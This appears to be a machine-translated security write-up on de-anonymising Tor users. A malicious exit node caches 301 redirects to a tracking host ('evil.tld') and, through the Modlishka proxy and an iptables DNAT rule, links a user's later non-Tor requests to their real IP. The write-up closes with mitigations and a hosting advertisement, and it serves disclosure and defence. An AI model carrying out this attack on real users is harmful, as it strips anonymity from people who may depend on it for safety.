Identifying the real IP addresses of Tor users via distorted cache

This article describes an example of the practical use of the “cache distortion through 301 redirect” attack, which can be used by the output node of the Tor network with malicious code to identify the real IP addresses of selected users.

Attack scenario

The attack scenario is as follows:

• Client: Chrome Canary (76.0.3796.0)
• The real IP address of the client: 5.60.164.177
• Client Tracking Option: 6b48c94a-cf58-452c-bc50-96bace981b27
• IP address of the output node of the Tor network: 51.38.150.126
• Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.)

Note: In this scenario, the Chrome browser was configured using the SOCKS5 network protocol to use the Tor network. The “Tor” network channel was configured for a specific test output node: '51 .38.150.126 '. This is also a validation of the concept and many settings can be optimized further ...
')
In the case of the malicious output node of the Tor network, all traffic is redirected through the Modlishka proxy server:

iptables -A OUTPUT -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80 iptables -A FORWARD -j ACCEPT 

Attack script description

Assumptions:

• A browser application (in this case, a standard browser) that will use the connection to the Tor network and, finally, the connection will pass through the malicious output node.
• A malicious Tor network output node that intercepts and distorts the cache of all HTTP traffic (the HTTP 301 response code), which does not have a transport layer cryptographic protocol (TLS).

Let's consider the following steps of the attack script:

1. The user connects to the Internet through the Tor network by configuring the browser to use the SOCKS5 network protocol of the Tor system, or by setting it so that all operating system traffic is redirected via the Tor network.
2. The user starts his usual Internet access session using his favorite browser, where usually a lot of HTTP traffic without the TLS security protocol is sent through the Tor network tunnel.
3. The malicious Tor exit node intercepts requests and responds by redirecting everyone using the HTTP 301 response code. These redirects will be constantly cached by the browser and will be sent to the tracking URL with the assigned Tor Client ID. The tracking URL can be created in the following way: user-identifier.evil.tld , where 'evil.tld' will collect all the information about the source IP address and redirect users to the originally requested hosts ... or alternatively to the transparent reverse A proxy server that attempts to intercept all subsequent HTTP traffic from client traffic. In addition, since it is possible to automatically distort the cache for most of the most popular domains (as described in the previous article), for example. Top 100 sites on Alexa’s statistics, the attacker maximizes his chances of identifying real IP addresses.
4. After logging out of the Tor network session, the user will switch to his regular network.
5. As soon as the user enters the address of one of the previous corrupted domains in the address bar (for example, “google.com”), the browser uses the cache for internal redirection to the tracking URL with the context identifier of the output node.
6. The output node will be able to match the previously intercepted HTTP request with the real IP address of the user using information obtained from an external host that used the tracking URL with the user ID. The “evil.tld” host will have information about all IP addresses that were used to access the tracking URL.

Obviously, this method allows you to effectively match selected HTTP requests with client IP addresses using the output Tor node. This happens because the previously generated tracking URL will be requested by the client through the “Tor” network tunnel, and then again, as soon as the connection through the standard Internet provider connection occurs. All because of the distorted code in the cache.

Another approach may be based on the implementation of modified JavaScript code with embedded URLs for tracking in the corresponding responses that do not have the “TLS” security protocol and changing the necessary control cache headers (eg 'Cache-Control: max-age = 31536000') . However, this approach is not very effective.

Tracking users through standard cookies of various web applications is also possible, but it is very difficult to force the client to visit the domain twice, which is under the attacker's control: first, when connecting via the output Tor network node, and then again after switching to the standard Internet connection. provider.

findings

The fact is that the attacker has the ability to make certain changes in the browser cache by introducing distorted code through malicious output nodes and to identify the real IP addresses of Tor users who send HTTP traffic without the TLS security protocol.

In addition, the distortion of a significant number of popular domain names will increase the likelihood of receiving a reverse HTTP request (with an assigned user ID), which will allow you to determine the real IP address of the user. You can try to intercept the domain from some browser clients and hope that the typo in the domain name will not be noticed by the user, or it will not be displayed (for example, the “WebViews” mobile application).

Ways to reduce risk:

• When connecting to the Internet via the Tor network, make sure that all traffic that does not use the TLS security protocol is disabled. An example of browser plug-ins that can be used: for Firefox and Chrome browsers.
• In addition, always use the “private” browser mode when connecting to the Internet via the Tor network.
• Do not redirect the traffic of your entire operating system through the Tor network until you are sure that all outgoing traffic uses the TLS security protocol ...
• If possible, always use the latest version of the Tor browser to browse the web.

---

The latest dual-processor configurations of dedicated servers with Intel Scalable 2019 processors are available on DEDIC.SH :

• 2x Xeon Silver 4214 - a total of 24 cores
• 2x Xeon Gold 5218 - total 32 cores
• 2x Xeon Gold 6240 - configuration with 36 cores.

Server cost with two Xeon Silver 4214 - from 15210 rub / month
We are also ready to collect any configuration for you - write to us !

If a large capacity of a dedicated server is not required - VDS from 150 rubles / month - what you need!